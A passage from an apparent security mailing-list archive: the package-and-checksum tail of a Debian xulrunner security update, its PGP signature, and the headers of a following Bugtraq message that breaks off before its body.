    Size/MD5 checksum:   302966 7cf37ed3bd131afd5d77ac4b6a4a0e80
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   293396 ebda2282ee4f81e8e972254522ab98ee
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:    71512 167d644c17e1fbeb7db1b586e1416516
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   130252 738d7bacc1f2037e6fd34e094382a414
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:  7348590 9b48fd7155a90c0d4b42a60b3ca87e21
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   162918 b4fb7360352ff7e3d3f4a1e4692f0399
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   386930 4b9a91448ef45dc0512a11197b568653
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:  3189364 8375722343ed726036dafe752298217b
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_alpha.deb
    Size/MD5 checksum:   765528 e30aa7d614c04ed6ba755184d53b0f83

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   149212 19ab1c22cd55db2bc8ee33be7fff759b
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   810610 5493e297887f037ed4cdd9c2150e68ed
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:    69626 4825855bdb9b5a8bb2c62436fde8ad7c
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:  6345322 f975d16444059b3b9ae1b43c1a9c0cda
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   756112 af22a3727a03e9bda037a329ee21df65
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   305094 4855bb5ffe73a231bb2a0d701616e7eb
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   279116 b7f981650c4b20db874b70a2bd6bc059
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   356260 dbec2df715586df57acd7228a3175ef9
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum: 45243162 2aba2e701aac5639822ce0e6ed911948
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:    53664 5d946fe8bf84c2e5514f0114ce77ac71
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   126976 76ebe8f1cc4eb9a881fdea16732c2674
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:   671242 269e0391c1bffea6f26c283457fdb5a3
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_amd64.deb
    Size/MD5 checksum:  3180000 ba7dcb523f47170cf40f8d07f078ff38

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum: 44767070 ff1a7f0d6d410e514b4fec797c978577
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   732710 a077246fbfa402b28df5b7c94ca64f03
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   326560 97d77b72fb59380c6dd65f2464b17748
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   260802 b517d6273306a6b2620717924d451c1e
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:    63374 14f5f6627a23585127b48559da6e0b3e
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   291166 727015b23b21585ad8bc15fa0c3c01c4
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   594490 b3eb4a04bdc1d00d6d735c651de116f9
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:    51382 5cbc748af5b9198cb129ce1fafd7a8d0
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   119438 6f3288cc981b5e5799bacf6befa8ce7c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   137188 8f3727780153f49902d4dd440f7a48ff
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:   705428 18ee2b57007cf41e8bc2888757c247c9
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:  5371364 d6ad1248c0949aaf3430662fbf367ded
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_arm.deb
    Size/MD5 checksum:  2970288 4b6793a379f21fc5eb06b98bd349a3e2

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum: 46155188 c37a7bf2fe01cb20fbe83b23c22c76c4
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   161944 c7498923bbb2ac0917b89f5e1bc1335d
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   302552 64dfa94053b2f5ebeca61307c7c687cf
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   132346 77b099b16d12baab295fbbb44b8e4705
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   391234 9b574c8782603f7f12caa0c622b79c57
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:  7553990 1ae462d397b8c4de85ed9bb44398fa68
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   288610 2ee1dd5d5f8b1f2dc2f31f1b47ee0401
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:    71188 f22b185182ded01cad34df565e33fa34
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:    53706 4ecb4b3c07ace717767c0ac6ab631816
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   875004 3841afcdff3a1cf37041560718db619f
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:  3105180 5d9c78af9a11d310200260b1862e1b77
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   753304 421db187ed2aaa135d7c6d1d72475cc1
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_hppa.deb
    Size/MD5 checksum:   704006 10305d20ffbd30ee9a8304b281ed410f

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum: 44716280 14630037caf61026b23b89cd2d7ee906
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:  3033738 a8d8501331ee08577ddc4c6ac79f8c82
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   337330 52fc267a0badecc2f6ee63fdefbb6b27
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:  5385268 656b0080011c0922718459ae8d57a65f
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   118962 f4dcddae42b65530be240a88a1fb0dce
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   268382 2a9f3e60120236105c636de6eeec6b16
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   140106 77d0dc883aca560cddda828961d8eb69
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:    64110 1acc5d5b8309b9ddecb5ee1e5565083b
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:    51204 6be1abbf15a3a7bef4972047be976c5d
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   743240 e9497985c4d89ae570b7a32347002733
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   715094 2eb3ec027c357d16e522ddfba8a677c6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   296684 2c92c0cfc031d09f2b064e9195f6832b
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_i386.deb
    Size/MD5 checksum:   628686 962d21ec6b9ecf88bec3a6e65fc51d5c

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   287808 d87e43a55b54420373bf40db42e91152
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   937358 91e2ec2a7b2c406b96a9c912e9e8ca36
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:    58184 71a0cd0e35e1743698a3a246f20f4d0a
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   533280 985c52b70f2dc075da26cea1a97df109
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:  1121834 19c744b9995ccdd855212e4ad6eb07ad
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   756020 a7cbe4174c6a39f3b8e1365193ed80ef
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:  9685590 763fa7e7d9cf7ad6cc95b2b924a894ce
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   199030 bab7b1f432fc24acc1ff56857ee18a0f
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   151088 560b8d6be4b0ad31fcc2159ac3d72649
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:   334942 81225ca738fb8f78974f321af108d866
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:  3052352 ab57bb5032c35aa66bdf47e777e72b37
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum: 45460812 9c2a67cf26debcdea09421c2e330b120
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_ia64.deb
    Size/MD5 checksum:    81142 2cf21c543bbb34561f6c2828ab7a08d0

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum: 46786690 9ccb2a732e0a2a49d1f1f9d5d68cef86
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   119034 0a10831d2377b7278cfbdb2e90574535
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:  5955860 db51379ca6bba623c738ec7cae30271a
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   809332 94a939e3ca873e217ef215fce9b63dc1
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   671304 fd3252bd400f87abc8350617d3a31c25
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:    65610 632f5a86ddeed0e5ff6747189b4d9169
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:    52820 b1a2dccc6643955c7763fd2920f22418
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   274358 10a1723ef97b4c11a3bb081d571e20c6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   312858 bf8db163f331cfbc9f1df9982813eab3
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   786828 9a1b768ccfae0c4dc5688c3362a2d9fc
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   352918 47b68c4cd5fdb3b5c8b2252e4cec0bd1
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:  3290808 61bae851c0f69a4a8499855db0a2bf44
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_mips.deb
    Size/MD5 checksum:   147064 c220f1717506e0f721b214c23344aae4

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   146654 66f51faead5bb8643b378056f7e91200
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   351756 cdbd6d5cc056fe7ab22e99c0b4b17303
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:  5758508 d2a8f3588c96dbd86a313415f942b796
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:    65448 2e91580fd824a483cf15e41329ee54d6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   670958 9ce924c9c7c373bcb66c3d142598b960
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   767374 db65bedd1451e3d002996607504f832c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:  3187790 205442831b53abed47347494afd74c13
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum: 45388864 53ba9135abdeb81b127319c2965d654c
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   118792 ebeeb6e0b3fa9697fc4d519dbf3445e3
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:    52882 9a492c7f088e33795f4f519e6d1fdb00
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   785634 15195ea21bea73366c040ec35205b411
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   305972 7c6cf13047b77819016441211306def6
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_mipsel.deb
    Size/MD5 checksum:   275352 7b73a4f8d7961a9e2e5be4a5edac6bb6

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   311370 dcc549b27be17ce12ad677571f7cd96c
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   775168 dc939366bb688b507d7f02e281f49ff9
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:    65310 08e712f2c7efc1ff4711a3fed99de972
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum: 46973282 628962bbf1d65f90cd45c289f4e57eb2
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   810170 3911108f3ad4ec7249de89579692a889
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:  3207248 c779f30b9617ce71eff5c7e38a50e700
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   350370 89f7abf6fe0374a40df224d17547a326
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   148354 e573866688369e0f33668e197ceb954a
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:    54152 137b9de7b7d101e6751448f9b376c542
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   125070 9f3c03fc4dcf3b92af90f6dbb028ec3b
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   641078 0d6cc0d69937519ec2a8b11c79620bba
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:  6113688 f14ea71428bbb9adc65fc9300af4dfaf
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_powerpc.deb
    Size/MD5 checksum:   280116 934b5afcd4d54c8a9334209394725b76

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   757252 fbbf4aa51c254501839c5239898a1966
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   688966 eadd50708786aa35fe3352133362268a
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum: 46106184 f900f01b8a4d665783b488dba85e5368
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:  3183730 7570c50c80b825f39b21faae4304c39c
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:    54394 14206509134b8cab968b770409f2721d
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   283734 e8f93eadcfedd43817fdef860a9b18f2
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   900078 2fc17c17b2db9069640e5a5a8da4c55c
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   307054 fad889ae074b09fe590bb6d256cea5e1
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:    70250 83853ab4be095ccad382c53ecb31a2b8
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:  6818036 e8b4b094912ad1dc2eaa4246f4072b33
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   127826 35a3df9656c60848ee92ad37426f0e26
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   160986 51635e7052198336a4560f42a8534809
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_s390.deb
    Size/MD5 checksum:   372762 44c448ce0bdd1fb906ce3fc0f1cae4db

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:  5691378 fb92fb8595fe77b778bf2f10cec49c59
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   720372 d6905da5cd02841a3a1504bc2414e6c0
  http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   119274 6ce21aa1465d61eab2441dea7e7dda47
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-gnome-support_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:    63586 04418e16def13078bdfb58e30864bec5
  http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:    51632 f4100de3c8fde3d8b45dc81af6a1d375
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-tools_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   587454 7e843d8cbedddd2e158bbcceca21f109
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   677262 85da1319d7f5eb22a66c11947d3eb447
  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:  2853912 6aaad890cf6475d08323566c1d45d3c6
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   137004 23c70ffb48e7fe2f77314a19a731435e
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs0d_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   323878 c27c6e54a5f9bae01bec83548ade9ea9
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   260544 b3703da635436037b1cbed4cc04567d4
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum:   284548 afec3eadc60217b0f63bfd4efbb17a53
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul0d-dbg_1.8.0.15~pre080614i-0etch1_sparc.deb
    Size/MD5 checksum: 44808802 f7dd5d65267da83f9050a83d3131f953


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkluSlEACgkQXm3vHE4uylqaSQCdHEKoQIiWiXHOm48S2S3v6cHS
kiQAoMoAN/iBzrG1wqUSgCr4Vq3R6Gd7
=KctC
-----END PGP SIGNATURE-----

From - Wed Jan 14 16:42:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39180-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 62746EC6CC
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:41:35 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3EA46236FF1; Wed, 14 Jan 2009 14:14:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10773 invoked from network); 14 Jan 2009 20:06:04 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
